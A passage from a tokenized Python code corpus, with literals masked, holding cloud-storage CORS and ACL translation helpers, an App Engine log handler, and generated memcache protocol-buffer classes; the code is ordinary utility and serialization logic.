gs . cors . HEADER , header ) ) <EOL> collection_elements . append ( ( boto . gs . cors . HEADERS , header_elements ) ) <EOL> cors . cors . append ( collection_elements ) <EOL> return cors <EOL> @ classmethod <EOL> def BotoCorsToMessage ( cls , boto_cors ) : <EOL> """<STR_LIT>""" <EOL> message_cors = [ ] <EOL> if boto_cors . cors : <EOL> for cors_collection in boto_cors . cors : <EOL> if cors_collection : <EOL> collection_message = apitools_messages . Bucket . CorsValueListEntry ( ) <EOL> for element_tuple in cors_collection : <EOL> if element_tuple [ <NUM_LIT:0> ] == boto . gs . cors . MAXAGESEC : <EOL> collection_message . maxAgeSeconds = int ( element_tuple [ <NUM_LIT:1> ] ) <EOL> if element_tuple [ <NUM_LIT:0> ] == boto . gs . cors . METHODS : <EOL> for method_tuple in element_tuple [ <NUM_LIT:1> ] : <EOL> collection_message . method . append ( method_tuple [ <NUM_LIT:1> ] ) <EOL> if element_tuple [ <NUM_LIT:0> ] == boto . gs . cors . ORIGINS : <EOL> for origin_tuple in element_tuple [ <NUM_LIT:1> ] : <EOL> collection_message . origin . append ( origin_tuple [ <NUM_LIT:1> ] ) <EOL> if element_tuple [ <NUM_LIT:0> ] == boto . gs . cors . HEADERS : <EOL> for header_tuple in element_tuple [ <NUM_LIT:1> ] : <EOL> collection_message . responseHeader . append ( header_tuple [ <NUM_LIT:1> ] ) <EOL> message_cors . append ( collection_message ) <EOL> return message_cors <EOL> @ classmethod <EOL> def JsonCorsToMessageEntries ( cls , json_cors ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> deserialized_cors = json . loads ( json_cors ) <EOL> cors = [ ] <EOL> for cors_entry in deserialized_cors : <EOL> cors . append ( encoding . DictToMessage ( <EOL> cors_entry , apitools_messages . Bucket . CorsValueListEntry ) ) <EOL> return cors <EOL> except ValueError : <EOL> CheckForXmlConfigurationAndRaise ( '<STR_LIT>' , json_cors ) <EOL> @ classmethod <EOL> def MessageEntriesToJson ( cls , cors_message ) : <EOL> """<STR_LIT>""" <EOL> json_text = '<STR_LIT>' <EOL> json_text += '<STR_LIT:[>' <EOL> printed_one = False <EOL> for cors_entry in cors_message : <EOL> if printed_one : <EOL> json_text += '<STR_LIT:U+002C>' <EOL> else : <EOL> printed_one = True <EOL> json_text += encoding . MessageToJson ( cors_entry ) <EOL> json_text += '<STR_LIT>' <EOL> return json_text <EOL> def S3MarkerAclFromObjectMetadata ( object_metadata ) : <EOL> """<STR_LIT>""" <EOL> if ( object_metadata and object_metadata . metadata and <EOL> object_metadata . metadata . additionalProperties ) : <EOL> for prop in object_metadata . metadata . additionalProperties : <EOL> if prop . key == S3_ACL_MARKER_GUID : <EOL> return prop . value <EOL> def AddS3MarkerAclToObjectMetadata ( object_metadata , acl_text ) : <EOL> """<STR_LIT>""" <EOL> if not object_metadata . metadata : <EOL> object_metadata . metadata = apitools_messages . Object . MetadataValue ( ) <EOL> if not object_metadata . metadata . additionalProperties : <EOL> object_metadata . metadata . additionalProperties = [ ] <EOL> object_metadata . metadata . additionalProperties . append ( <EOL> apitools_messages . Object . MetadataValue . AdditionalProperty ( <EOL> key = S3_ACL_MARKER_GUID , value = acl_text ) ) <EOL> class AclTranslation ( object ) : <EOL> """<STR_LIT>""" <EOL> JSON_TO_XML_ROLES = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> XML_TO_JSON_ROLES = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> @ classmethod <EOL> def BotoAclFromJson ( cls , acl_json ) : <EOL> acl = ACL ( ) <EOL> acl . parent = None <EOL> acl . entries = cls . BotoEntriesFromJson ( acl_json , acl ) <EOL> return acl <EOL> @ classmethod <EOL> def BotoAclFromMessage ( cls , acl_message ) : <EOL> acl_dicts = [ ] <EOL> for message in acl_message : <EOL> if message == PRIVATE_DEFAULT_OBJ_ACL : <EOL> break <EOL> acl_dicts . append ( encoding . MessageToDict ( message ) ) <EOL> return cls . BotoAclFromJson ( acl_dicts ) <EOL> @ classmethod <EOL> def BotoAclToJson ( cls , acl ) : <EOL> if hasattr ( acl , '<STR_LIT>' ) : <EOL> return cls . BotoEntriesToJson ( acl . entries ) <EOL> return [ ] <EOL> @ classmethod <EOL> def BotoObjectAclToMessage ( cls , acl ) : <EOL> for entry in cls . BotoAclToJson ( acl ) : <EOL> message = encoding . DictToMessage ( entry , <EOL> apitools_messages . ObjectAccessControl ) <EOL> message . kind = u'<STR_LIT>' <EOL> yield message <EOL> @ classmethod <EOL> def BotoBucketAclToMessage ( cls , acl ) : <EOL> for entry in cls . BotoAclToJson ( acl ) : <EOL> message = encoding . DictToMessage ( entry , <EOL> apitools_messages . BucketAccessControl ) <EOL> message . kind = u'<STR_LIT>' <EOL> yield message <EOL> @ classmethod <EOL> def BotoEntriesFromJson ( cls , acl_json , parent ) : <EOL> entries = Entries ( parent ) <EOL> entries . parent = parent <EOL> entries . entry_list = [ cls . BotoEntryFromJson ( entry_json ) <EOL> for entry_json in acl_json ] <EOL> return entries <EOL> @ classmethod <EOL> def BotoEntriesToJson ( cls , entries ) : <EOL> return [ cls . BotoEntryToJson ( entry ) for entry in entries . entry_list ] <EOL> @ classmethod <EOL> def BotoEntryFromJson ( cls , entry_json ) : <EOL> """<STR_LIT>""" <EOL> entity = entry_json [ '<STR_LIT>' ] <EOL> permission = cls . JSON_TO_XML_ROLES [ entry_json [ '<STR_LIT>' ] ] <EOL> if entity . lower ( ) == ALL_USERS . lower ( ) : <EOL> return Entry ( type = ALL_USERS , permission = permission ) <EOL> elif entity . lower ( ) == ALL_AUTHENTICATED_USERS . lower ( ) : <EOL> return Entry ( type = ALL_AUTHENTICATED_USERS , permission = permission ) <EOL> elif entity . startswith ( '<STR_LIT>' ) : <EOL> raise CommandException ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> elif '<STR_LIT:email>' in entry_json : <EOL> if entity . startswith ( '<STR_LIT:user>' ) : <EOL> scope_type = USER_BY_EMAIL <EOL> elif entity . startswith ( '<STR_LIT>' ) : <EOL> scope_type = GROUP_BY_EMAIL <EOL> return Entry ( type = scope_type , email_address = entry_json [ '<STR_LIT:email>' ] , <EOL> permission = permission ) <EOL> elif '<STR_LIT>' in entry_json : <EOL> if entity . startswith ( '<STR_LIT:user>' ) : <EOL> scope_type = USER_BY_ID <EOL> elif entity . startswith ( '<STR_LIT>' ) : <EOL> scope_type = GROUP_BY_ID <EOL> return Entry ( type = scope_type , id = entry_json [ '<STR_LIT>' ] , <EOL> permission = permission ) <EOL> elif '<STR_LIT>' in entry_json : <EOL> if entity . startswith ( '<STR_LIT>' ) : <EOL> scope_type = GROUP_BY_DOMAIN <EOL> return Entry ( type = scope_type , domain = entry_json [ '<STR_LIT>' ] , <EOL> permission = permission ) <EOL> raise CommandException ( '<STR_LIT>' ) <EOL> @ classmethod <EOL> def BotoEntryToJson ( cls , entry ) : <EOL> """<STR_LIT>""" <EOL> acl_entry_json = { } <EOL> scope_type_lower = entry . scope . type . lower ( ) <EOL> if scope_type_lower == ALL_USERS . lower ( ) : <EOL> acl_entry_json [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> elif scope_type_lower == ALL_AUTHENTICATED_USERS . lower ( ) : <EOL> acl_entry_json [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> elif scope_type_lower == USER_BY_EMAIL . lower ( ) : <EOL> acl_entry_json [ '<STR_LIT>' ] = '<STR_LIT>' % entry . scope . email_address <EOL> acl_entry_json [ '<STR_LIT:email>' ] = entry . scope . email_address <EOL> elif scope_type_lower == USER_BY_ID . lower ( ) : <EOL> acl_entry_json [ '<STR_LIT>' ] = '<STR_LIT>' % entry . scope . id <EOL> acl_entry_json [ '<STR_LIT>' ] = entry . scope . id <EOL> elif scope_type_lower == GROUP_BY_EMAIL . lower ( ) : <EOL> acl_entry_json [ '<STR_LIT>' ] = '<STR_LIT>' % entry . scope . email_address <EOL> acl_entry_json [ '<STR_LIT:email>' ] = entry . scope . email_address <EOL> elif scope_type_lower == GROUP_BY_ID . lower ( ) : <EOL> acl_entry_json [ '<STR_LIT>' ] = '<STR_LIT>' % entry . scope . id <EOL> acl_entry_json [ '<STR_LIT>' ] = entry . scope . id <EOL> elif scope_type_lower == GROUP_BY_DOMAIN . lower ( ) : <EOL> acl_entry_json [ '<STR_LIT>' ] = '<STR_LIT>' % entry . scope . domain <EOL> acl_entry_json [ '<STR_LIT>' ] = entry . scope . domain <EOL> else : <EOL> raise ArgumentException ( '<STR_LIT>' % <EOL> scope_type_lower ) <EOL> acl_entry_json [ '<STR_LIT>' ] = cls . XML_TO_JSON_ROLES [ entry . permission ] <EOL> return acl_entry_json <EOL> @ classmethod <EOL> def JsonToMessage ( cls , json_data , message_type ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> deserialized_acl = json . loads ( json_data ) <EOL> acl = [ ] <EOL> for acl_entry in deserialized_acl : <EOL> acl . append ( encoding . DictToMessage ( acl_entry , message_type ) ) <EOL> return acl <EOL> except ValueError : <EOL> CheckForXmlConfigurationAndRaise ( '<STR_LIT>' , json_data ) <EOL> @ classmethod <EOL> def JsonFromMessage ( cls , acl ) : <EOL> """<STR_LIT>""" <EOL> serializable_acl = [ ] <EOL> if acl is not None : <EOL> for acl_entry in acl : <EOL> if acl_entry . kind == u'<STR_LIT>' : <EOL> acl_entry . object = None <EOL> acl_entry . generation = None <EOL> acl_entry . kind = None <EOL> acl_entry . bucket = None <EOL> acl_entry . id = None <EOL> acl_entry . selfLink = None <EOL> acl_entry . etag = None <EOL> serializable_acl . append ( encoding . MessageToDict ( acl_entry ) ) <EOL> return json . dumps ( serializable_acl , sort_keys = True , <EOL> indent = <NUM_LIT:2> , separators = ( '<STR_LIT:U+002C>' , '<STR_LIT>' ) ) </s>
<s> """<STR_LIT>""" <EOL> import inspect <EOL> import logging <EOL> from google . appengine import runtime <EOL> from google . appengine . api import logservice <EOL> from google . appengine . runtime import features <EOL> NEWLINE_REPLACEMENT = "<STR_LIT>" <EOL> class AppLogsHandler ( logging . Handler ) : <EOL> """<STR_LIT>""" <EOL> def emit ( self , record ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if features . IsEnabled ( "<STR_LIT>" ) : <EOL> logservice . write_record ( self . _AppLogsLevel ( record . levelno ) , <EOL> record . created , <EOL> self . format ( record ) , <EOL> self . _AppLogsLocation ( ) ) <EOL> else : <EOL> message = self . _AppLogsMessage ( record ) <EOL> if isinstance ( message , unicode ) : <EOL> message = message . encode ( "<STR_LIT>" ) <EOL> logservice . write ( message ) <EOL> except ( KeyboardInterrupt , SystemExit , runtime . DeadlineExceededError ) : <EOL> raise <EOL> except : <EOL> self . handleError ( record ) <EOL> def _AppLogsMessage ( self , record ) : <EOL> """<STR_LIT>""" <EOL> message = self . format ( record ) . replace ( "<STR_LIT:\r\n>" , NEWLINE_REPLACEMENT ) <EOL> message = message . replace ( "<STR_LIT:\r>" , NEWLINE_REPLACEMENT ) <EOL> message = message . replace ( "<STR_LIT:\n>" , NEWLINE_REPLACEMENT ) <EOL> return "<STR_LIT>" % ( self . _AppLogsLevel ( record . levelno ) , <EOL> long ( record . created * <NUM_LIT:1000> * <NUM_LIT:1000> ) , <EOL> message ) <EOL> def _AppLogsLevel ( self , level ) : <EOL> """<STR_LIT>""" <EOL> if level >= logging . CRITICAL : <EOL> return <NUM_LIT:4> <EOL> elif level >= logging . ERROR : <EOL> return <NUM_LIT:3> <EOL> elif level >= logging . WARNING : <EOL> return <NUM_LIT:2> <EOL> elif level >= logging . INFO : <EOL> return <NUM_LIT:1> <EOL> else : <EOL> return <NUM_LIT:0> <EOL> def _AppLogsLocation ( self ) : <EOL> """<STR_LIT>""" <EOL> if not features . IsEnabled ( "<STR_LIT>" ) : <EOL> return None <EOL> def IsLogging ( f ) : <EOL> return f . f_code . co_filename . endswith ( "<STR_LIT>" ) <EOL> f = inspect . currentframe ( ) <EOL> while f and not IsLogging ( f ) : <EOL> f = f . f_back <EOL> while f and IsLogging ( f ) : <EOL> f = f . f_back <EOL> return inspect . getframeinfo ( f ) [ : <NUM_LIT:3> ] if f else None </s>
<s> """<STR_LIT>""" <EOL> from file import * <EOL> import blobstore <EOL> import gs <EOL> import shuffler </s>
<s> from google . net . proto import ProtocolBuffer <EOL> import array <EOL> import dummy_thread as thread <EOL> __pychecker__ = """<STR_LIT>""" <EOL> if hasattr ( ProtocolBuffer , '<STR_LIT>' ) : <EOL> _extension_runtime = True <EOL> _ExtendableProtocolMessage = ProtocolBuffer . ExtendableProtocolMessage <EOL> else : <EOL> _extension_runtime = False <EOL> _ExtendableProtocolMessage = ProtocolBuffer . ProtocolMessage <EOL> class MemcacheServiceError ( ProtocolBuffer . ProtocolMessage ) : <EOL> OK = <NUM_LIT:0> <EOL> UNSPECIFIED_ERROR = <NUM_LIT:1> <EOL> NAMESPACE_NOT_SET = <NUM_LIT:2> <EOL> PERMISSION_DENIED = <NUM_LIT:3> <EOL> INVALID_VALUE = <NUM_LIT:6> <EOL> UNAVAILABLE = <NUM_LIT:9> <EOL> _ErrorCode_NAMES = { <EOL> <NUM_LIT:0> : "<STR_LIT:OK>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:9> : "<STR_LIT>" , <EOL> } <EOL> def ErrorCode_Name ( cls , x ) : return cls . _ErrorCode_NAMES . get ( x , "<STR_LIT>" ) <EOL> ErrorCode_Name = classmethod ( ErrorCode_Name ) <EOL> def __init__ ( self , contents = None ) : <EOL> pass <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> return n <EOL> def Clear ( self ) : <EOL> pass <EOL> def OutputUnchecked ( self , out ) : <EOL> pass <EOL> def OutputPartial ( self , out ) : <EOL> pass <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> } , <NUM_LIT:0> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:0> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class AppOverride ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_app_id_ = <NUM_LIT:0> <EOL> app_id_ = "<STR_LIT>" <EOL> has_num_memcacheg_backends_ = <NUM_LIT:0> <EOL> num_memcacheg_backends_ = <NUM_LIT:0> <EOL> has_ignore_shardlock_ = <NUM_LIT:0> <EOL> ignore_shardlock_ = <NUM_LIT:0> <EOL> has_memcache_pool_hint_ = <NUM_LIT:0> <EOL> memcache_pool_hint_ = "<STR_LIT>" <EOL> has_memcache_sharding_strategy_ = <NUM_LIT:0> <EOL> memcache_sharding_strategy_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def app_id ( self ) : return self . app_id_ <EOL> def set_app_id ( self , x ) : <EOL> self . has_app_id_ = <NUM_LIT:1> <EOL> self . app_id_ = x <EOL> def clear_app_id ( self ) : <EOL> if self . has_app_id_ : <EOL> self . has_app_id_ = <NUM_LIT:0> <EOL> self . app_id_ = "<STR_LIT>" <EOL> def has_app_id ( self ) : return self . has_app_id_ <EOL> def num_memcacheg_backends ( self ) : return self . num_memcacheg_backends_ <EOL> def set_num_memcacheg_backends ( self , x ) : <EOL> self . has_num_memcacheg_backends_ = <NUM_LIT:1> <EOL> self . num_memcacheg_backends_ = x <EOL> def clear_num_memcacheg_backends ( self ) : <EOL> if self . has_num_memcacheg_backends_ : <EOL> self . has_num_memcacheg_backends_ = <NUM_LIT:0> <EOL> self . num_memcacheg_backends_ = <NUM_LIT:0> <EOL> def has_num_memcacheg_backends ( self ) : return self . has_num_memcacheg_backends_ <EOL> def ignore_shardlock ( self ) : return self . ignore_shardlock_ <EOL> def set_ignore_shardlock ( self , x ) : <EOL> self . has_ignore_shardlock_ = <NUM_LIT:1> <EOL> self . ignore_shardlock_ = x <EOL> def clear_ignore_shardlock ( self ) : <EOL> if self . has_ignore_shardlock_ : <EOL> self . has_ignore_shardlock_ = <NUM_LIT:0> <EOL> self . ignore_shardlock_ = <NUM_LIT:0> <EOL> def has_ignore_shardlock ( self ) : return self . has_ignore_shardlock_ <EOL> def memcache_pool_hint ( self ) : return self . memcache_pool_hint_ <EOL> def set_memcache_pool_hint ( self , x ) : <EOL> self . has_memcache_pool_hint_ = <NUM_LIT:1> <EOL> self . memcache_pool_hint_ = x <EOL> def clear_memcache_pool_hint ( self ) : <EOL> if self . has_memcache_pool_hint_ : <EOL> self . has_memcache_pool_hint_ = <NUM_LIT:0> <EOL> self . memcache_pool_hint_ = "<STR_LIT>" <EOL> def has_memcache_pool_hint ( self ) : return self . has_memcache_pool_hint_ <EOL> def memcache_sharding_strategy ( self ) : return self . memcache_sharding_strategy_ <EOL> def set_memcache_sharding_strategy ( self , x ) : <EOL> self . has_memcache_sharding_strategy_ = <NUM_LIT:1> <EOL> self . memcache_sharding_strategy_ = x <EOL> def clear_memcache_sharding_strategy ( self ) : <EOL> if self . has_memcache_sharding_strategy_ : <EOL> self . has_memcache_sharding_strategy_ = <NUM_LIT:0> <EOL> self . memcache_sharding_strategy_ = "<STR_LIT>" <EOL> def has_memcache_sharding_strategy ( self ) : return self . has_memcache_sharding_strategy_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_app_id ( ) ) : self . set_app_id ( x . app_id ( ) ) <EOL> if ( x . has_num_memcacheg_backends ( ) ) : self . set_num_memcacheg_backends ( x . num_memcacheg_backends ( ) ) <EOL> if ( x . has_ignore_shardlock ( ) ) : self . set_ignore_shardlock ( x . ignore_shardlock ( ) ) <EOL> if ( x . has_memcache_pool_hint ( ) ) : self . set_memcache_pool_hint ( x . memcache_pool_hint ( ) ) <EOL> if ( x . has_memcache_sharding_strategy ( ) ) : self . set_memcache_sharding_strategy ( x . memcache_sharding_strategy ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_app_id_ != x . has_app_id_ : return <NUM_LIT:0> <EOL> if self . has_app_id_ and self . app_id_ != x . app_id_ : return <NUM_LIT:0> <EOL> if self . has_num_memcacheg_backends_ != x . has_num_memcacheg_backends_ : return <NUM_LIT:0> <EOL> if self . has_num_memcacheg_backends_ and self . num_memcacheg_backends_ != x . num_memcacheg_backends_ : return <NUM_LIT:0> <EOL> if self . has_ignore_shardlock_ != x . has_ignore_shardlock_ : return <NUM_LIT:0> <EOL> if self . has_ignore_shardlock_ and self . ignore_shardlock_ != x . ignore_shardlock_ : return <NUM_LIT:0> <EOL> if self . has_memcache_pool_hint_ != x . has_memcache_pool_hint_ : return <NUM_LIT:0> <EOL> if self . has_memcache_pool_hint_ and self . memcache_pool_hint_ != x . memcache_pool_hint_ : return <NUM_LIT:0> <EOL> if self . has_memcache_sharding_strategy_ != x . has_memcache_sharding_strategy_ : return <NUM_LIT:0> <EOL> if self . has_memcache_sharding_strategy_ and self . memcache_sharding_strategy_ != x . memcache_sharding_strategy_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_app_id_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . app_id_ ) ) <EOL> if ( self . has_num_memcacheg_backends_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . num_memcacheg_backends_ ) <EOL> if ( self . has_ignore_shardlock_ ) : n += <NUM_LIT:2> <EOL> if ( self . has_memcache_pool_hint_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . memcache_pool_hint_ ) ) <EOL> if ( self . has_memcache_sharding_strategy_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . memcache_sharding_strategy_ ) ) <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_app_id_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . app_id_ ) ) <EOL> if ( self . has_num_memcacheg_backends_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . num_memcacheg_backends_ ) <EOL> if ( self . has_ignore_shardlock_ ) : n += <NUM_LIT:2> <EOL> if ( self . has_memcache_pool_hint_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . memcache_pool_hint_ ) ) <EOL> if ( self . has_memcache_sharding_strategy_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . memcache_sharding_strategy_ ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_app_id ( ) <EOL> self . clear_num_memcacheg_backends ( ) <EOL> self . clear_ignore_shardlock ( ) <EOL> self . clear_memcache_pool_hint ( ) <EOL> self . clear_memcache_sharding_strategy ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . app_id_ ) <EOL> if ( self . has_num_memcacheg_backends_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . num_memcacheg_backends_ ) <EOL> if ( self . has_ignore_shardlock_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putBoolean ( self . ignore_shardlock_ ) <EOL> if ( self . has_memcache_pool_hint_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . memcache_pool_hint_ ) <EOL> if ( self . has_memcache_sharding_strategy_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . memcache_sharding_strategy_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_app_id_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . app_id_ ) <EOL> if ( self . has_num_memcacheg_backends_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . num_memcacheg_backends_ ) <EOL> if ( self . has_ignore_shardlock_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putBoolean ( self . ignore_shardlock_ ) <EOL> if ( self . has_memcache_pool_hint_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . memcache_pool_hint_ ) <EOL> if ( self . has_memcache_sharding_strategy_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . memcache_sharding_strategy_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_app_id ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . set_num_memcacheg_backends ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_ignore_shardlock ( d . getBoolean ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_memcache_pool_hint ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_memcache_sharding_strategy ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_app_id_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . app_id_ ) ) <EOL> if self . has_num_memcacheg_backends_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . num_memcacheg_backends_ ) ) <EOL> if self . has_ignore_shardlock_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatBool ( self . ignore_shardlock_ ) ) <EOL> if self . has_memcache_pool_hint_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . memcache_pool_hint_ ) ) <EOL> if self . has_memcache_sharding_strategy_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . memcache_sharding_strategy_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kapp_id = <NUM_LIT:1> <EOL> knum_memcacheg_backends = <NUM_LIT:2> <EOL> kignore_shardlock = <NUM_LIT:3> <EOL> kmemcache_pool_hint = <NUM_LIT:4> <EOL> kmemcache_sharding_strategy = <NUM_LIT:5> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> } , <NUM_LIT:5> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:4> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:5> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:5> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheGetRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_name_space_ = <NUM_LIT:0> <EOL> name_space_ = "<STR_LIT>" <EOL> has_for_cas_ = <NUM_LIT:0> <EOL> for_cas_ = <NUM_LIT:0> <EOL> has_override_ = <NUM_LIT:0> <EOL> override_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . key_ = [ ] <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def key_size ( self ) : return len ( self . key_ ) <EOL> def key_list ( self ) : return self . key_ <EOL> def key ( self , i ) : <EOL> return self . key_ [ i ] <EOL> def set_key ( self , i , x ) : <EOL> self . key_ [ i ] = x <EOL> def add_key ( self , x ) : <EOL> self . key_ . append ( x ) <EOL> def clear_key ( self ) : <EOL> self . key_ = [ ] <EOL> def name_space ( self ) : return self . name_space_ <EOL> def set_name_space ( self , x ) : <EOL> self . has_name_space_ = <NUM_LIT:1> <EOL> self . name_space_ = x <EOL> def clear_name_space ( self ) : <EOL> if self . has_name_space_ : <EOL> self . has_name_space_ = <NUM_LIT:0> <EOL> self . name_space_ = "<STR_LIT>" <EOL> def has_name_space ( self ) : return self . has_name_space_ <EOL> def for_cas ( self ) : return self . for_cas_ <EOL> def set_for_cas ( self , x ) : <EOL> self . has_for_cas_ = <NUM_LIT:1> <EOL> self . for_cas_ = x <EOL> def clear_for_cas ( self ) : <EOL> if self . has_for_cas_ : <EOL> self . has_for_cas_ = <NUM_LIT:0> <EOL> self . for_cas_ = <NUM_LIT:0> <EOL> def has_for_cas ( self ) : return self . has_for_cas_ <EOL> def override ( self ) : <EOL> if self . override_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . override_ is None : self . override_ = AppOverride ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . override_ <EOL> def mutable_override ( self ) : self . has_override_ = <NUM_LIT:1> ; return self . override ( ) <EOL> def clear_override ( self ) : <EOL> if self . has_override_ : <EOL> self . has_override_ = <NUM_LIT:0> ; <EOL> if self . override_ is not None : self . override_ . Clear ( ) <EOL> def has_override ( self 